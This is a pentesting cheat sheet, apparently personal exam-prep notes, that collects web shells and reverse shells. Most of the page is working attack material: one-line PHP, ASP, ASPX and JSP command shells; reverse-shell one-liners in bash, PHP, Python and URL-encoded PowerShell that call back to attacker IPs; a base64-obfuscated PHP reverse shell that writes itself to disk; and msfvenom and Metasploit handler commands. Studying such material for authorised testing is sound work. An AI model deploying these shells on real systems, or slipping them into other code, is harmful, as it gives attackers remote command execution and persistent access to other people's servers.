References
Tools
Onelin3r
Copy pip install one-lin3r LazyShell
Webroot
Web Server
Default Webroot
Custom shells
PHP
Linux
Copy <? php system ( $_REQUEST[ 'cmd' ] ) ; ?>
Copy http://SERVER_IP:PORT/uploads/shell.php?cmd=id
Copy <? php system ( $_GET[ 'cmd' ] ) ; ?>
<? php echo "<pre>" . shell_exec ( $_GET[ "cmd" ] ) . "</pre>" ; ?> Windows
Copy <?php echo exec($_GET["cmd"]);?> Reverse shell - Linux
Copy <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'"); ?>
Copy php -r '$s=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
Copy php -r '$s=fsockopen("<IP>",<PORT>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
Copy php -r '$s=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
Copy php -r '$s=fsockopen("<IP>",<PORT>);system("/bin/sh -i <&3 >&3 2>&3");'
Copy php -r '$s=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");' With Base 64 - Decode, change IP PORT, encode, change payload
Copy <!DOCTYPE html><html><head><title>PHP Code with HTML</title></head><body><?php $tem1 = base64_decode("PD9waHAKc2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTkyLjE2OC4xLjgnOwokcG9ydCA9IDQ0MzsKJGNodW5rX3NpemUgPSAxNDAwOwokd3JpdGVfYSA9IG51bGw7CiRlcnJvcl9hID0gbnVsbDsKJHNoZWxsID0gJ3VuYW1lIC1hOyB3OyBpZDsgL2Jpbi9zaCAtaSc7CiRkYWVtb24gPSAwOwokZGVidWcgPSAwOwppZiAoZnVuY3Rpb25fZXhpc3RzKCdwY250bF9mb3JrJykpIHsKCSRwaWQgPSBwY250bF9mb3JrKCk7CglpZiAoJHBpZCA9PSAtMSkgewoJCXByaW50aXQoIkVSUk9SOiBDYW4ndCBmb3JrIik7CgkJZXhpdCgxKTsKCX0KCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIC8vIFBhcmVudCBleGl0cwoJfQoJaWYgKHBvc2l4X3NldHNpZCgpID09IC0xKSB7CgkJcHJpbnRpdCgiRXJyb3I6IENhbid0IHNldHNpZCgpIik7CgkJZXhpdCgxKTsKCX0KCSRkYWVtb24gPSAxOwp9IGVsc2UgewoJcHJpbnRpdCgiV0FSTklORzogRmFpbGVkIHRvIGRhZW1vbmlzZS4gIFRoaXMgaXMgcXVpdGUgY29tbW9uIGFuZCBub3QgZmF0YWwuIik7Cn0KY2hkaXIoIi8iKTsKdW1hc2soMCk7CiRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOwppZiAoISRzb2NrKSB7CglwcmludGl0KCIkZXJyc3RyICgkZXJybm8pIik7CglleGl0KDEpOwp9CiRkZXNjcmlwdG9yc3BlYyA9IGFycmF5KAogICAwID0+IGFycmF5KCJwaXBlIiwgInIiKSwgIC8vIHN0ZGluIGlzIGEgcGlwZSB0aGF0IHRoZSBjaGlsZCB3aWxsIHJlYWQgZnJvbQogICAxID0+IGFycmF5KCJwaXBlIiwgInciKSwgIC8vIHN0ZG91dCBpcyBhIHBpcGUgdGhhdCB0aGUgY2hpbGQgd2lsbCB3cml0ZSB0bwogICAyID0+IGFycmF5KCJwaXBlIiwgInciKSAgIC8vIHN0ZGVyciBpcyBhIHBpcGUgdGhhdCB0aGUgY2hpbGQgd2lsbCB3cml0ZSB0bwopOwokcHJvY2VzcyA9IHByb2Nfb3Blbigkc2hlbGwsICRkZXNjcmlwdG9yc3BlYywgJHBpcGVzKTsKaWYgKCFpc19yZXNvdXJjZSgkcHJvY2VzcykpIHsKCXByaW50aXQoIkVSUk9SOiBDYW4ndCBzcGF3biBzaGVsbCIpOwoJZXhpdCgxKTsKfQpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1swXSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsKc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMl0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRzb2NrLCAwKTsKcHJpbnRpdCgiU3VjY2Vzc2Z1bGx5IG9wZW5lZCByZXZlcnNlIHNoZWxsIHRvICRpcDokcG9ydCIpOwp3aGlsZSAoMSkgewoJLy8gQ2hlY2sgZm9yIGVuZCBvZiBUQ1AgY29ubmVjdGlvbgoJaWYgKGZlb2YoJHNvY2spKSB7CgkJcHJpbnRpdCgiRVJST1I6IFNoZWxsIGNvbm5lY3Rpb24gdGVybWluYXRlZCIpOwoJCWJyZWFrOwoJfQoJaWYgKGZlb2YoJHBpcGVzWzFdKSkgewoJCXByaW50aXQoIkVSUk9SOiBTaGVsbCBwcm9jZXNzIHRlcm1pbmF0ZWQiKTsKCQlicmVhazsKCX0KCSRyZWFkX2EgPSBhcnJheSgkc29jaywgJHBpcGVzWzFdLCAkcGlwZXNbMl0pOwoJJG51bV9jaGFuZ2VkX3NvY2tldHMgPSBzdHJlYW1fc2VsZWN0KCRyZWFkX2EsICR3cml0ZV9hLCAkZXJyb3JfYSwgbnVsbCk7CglpZiAoaW5fYXJyYXkoJHNvY2ssICRyZWFkX2EpKSB7CgkJaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSyBSRUFEIik7CgkJJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsKCQlpZiAoJGRlYnVnKSBwcmludGl0KCJTT0NLOiAkaW5wdXQiKTsKCQlmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwoJfQoJaWYgKGluX2FycmF5KCRwaXBlc1sxXSwgJHJlYWRfYSkpIHsKCQlpZiAoJGRlYnVnKSBwcmludGl0KCJTVERPVVQgUkVBRCIpOwoJCSRpbnB1dCA9IGZyZWFkKCRwaXBlc1sxXSwgJGNodW5rX3NpemUpOwoJCWlmICgkZGVidWcpIHByaW50aXQoIlNURE9VVDogJGlucHV0Iik7CgkJZndyaXRlKCRzb2NrLCAkaW5wdXQpOwoJfQoJaWYgKGluX2FycmF5KCRwaXBlc1syXSwgJHJlYWRfYSkpIHsKCQlpZiAoJGRlYnVnKSBwcmludGl0KCJTVERFUlIgUkVBRCIpOwoJCSRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOwoJCWlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUjogJGlucHV0Iik7CgkJZndyaXRlKCRzb2NrLCAkaW5wdXQpOwoJfQp9CmZjbG9zZSgkc29jayk7CmZjbG9zZSgkcGlwZXNbMF0pOwpmY2xvc2UoJHBpcGVzWzFdKTsKZmNsb3NlKCRwaXBlc1syXSk7CnByb2NfY2xvc2UoJHByb2Nlc3MpOwpmdW5jdGlvbiBwcmludGl0ICgkc3RyaW5nKSB7CglpZiAoISRkYWVtb24pIHsKCQlwcmludCAiJHN0cmluZ1xuIjsKCX0KfQo/PiA="); $file = fopen("php1.php", "w"); echo fwrite($file, $tem1); fclose($file); ?></body></html> Ref: https://x.com/bountywriteups/status/1844330355450331235?t=mPxG2Tz49KPkkRSK6fIoXA&s=03
Or upload simple shell and use rs oneliner, for example:
Copy 10.10.10.185/images/blank.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.90%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 with powershell (Windows)
Copy ?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22 ASP
Copy <% eval request('cmd') %> With msfvenom
Copy msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Webshells collection
SecLists Webshells
Copy ls /opt/seclists/Web-Shells/
backdoor_list.txt CFM FuzzDB JSP laudanum-1.0 Magento PHP Vtiger WordPress Laudanum repo
Copy cp /opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx . PHP
Copy [Apr 08, 2024 - 03:50:25 (EDT)] exegol-CPTS /workspace # locate cmd.php
/opt/seclists/Web-Shells/FuzzDB/cmd.php
[Apr 08, 2024 - 03:51:51 (EDT)] exegol-CPTS /workspace # locate shell.php
/opt/seclists/Web-Shells/PHP/another-obfuscated-phpshell.php
/opt/seclists/Web-Shells/PHP/obfuscated-phpshell.php
/opt/seclists/Web-Shells/WordPress/plugin-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/shell.php
Copy <? php system ( $_REQUEST[ "cmd" ] ) ; ?>
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/ www / html / shell . php
?cmd=id
Copy curl http://SERVER_IP:PORT/shell.php?cmd=id p0wny shell
Automate the bypass of php functions restriction (as system, etc.)
Works on Linux and Windows
PHPBash
wwwolf's PHP web shell
C99 Webshell
PentestMonkey - Reverse shell
JSP
Copy [Apr 08, 2024 - 03:50:32 (EDT)] exegol-CPTS /workspace # locate cmd.jsp
/opt/seclists/Web-Shells/FuzzDB/cmd.jsp
/opt/seclists/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp
/opt/tools/SSRFmap/data/cmd.jsp
/opt/tools/clusterd/src/lib/resources/cmd.jsp
Apr 08, 2024 - 03:52:01 (EDT)] exegol-CPTS /workspace # locate shell.jsp
/opt/seclists/Web-Shells/JSP/simple-shell.jsp
Copy <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ASP
Copy [Apr 08, 2024 - 03:51:48 (EDT)] exegol-CPTS /workspace # locate shell.asp
/opt/seclists/Web-Shells/laudanum-1.0/asp/shell.asp
Copy <% eval request("cmd") %> ASPX
Copy [Apr 08, 2024 - 03:49:48 (EDT)] exegol-CPTS /workspace # locate cmd.aspx
/opt/seclists/Web-Shells/FuzzDB/cmd.aspx
[Apr 08, 2024 - 03:51:08 (EDT)] exegol-CPTS /workspace # locate shell.aspx
/opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx Metasploit
Copy $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2819 bytes
Copy msf6 exploit(multi/handler) > set LHOST 10.10.14.5
LHOST => 10.10.14.5
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.5:1337 Antak WebShell
Modify the shell for use
SharPyShell - Tiny and obfuscated ASP.NET webshell
Copy python3 SharPyShell.py generate -p somepassword
Copy python3 SharPyShell.py interact -u <http://target.url/sharpyshell.aspx> -p somepassword WAR
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war
Copy msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war msf6 exploit(multi/handler)
Tomcat (8080)
Shell ++
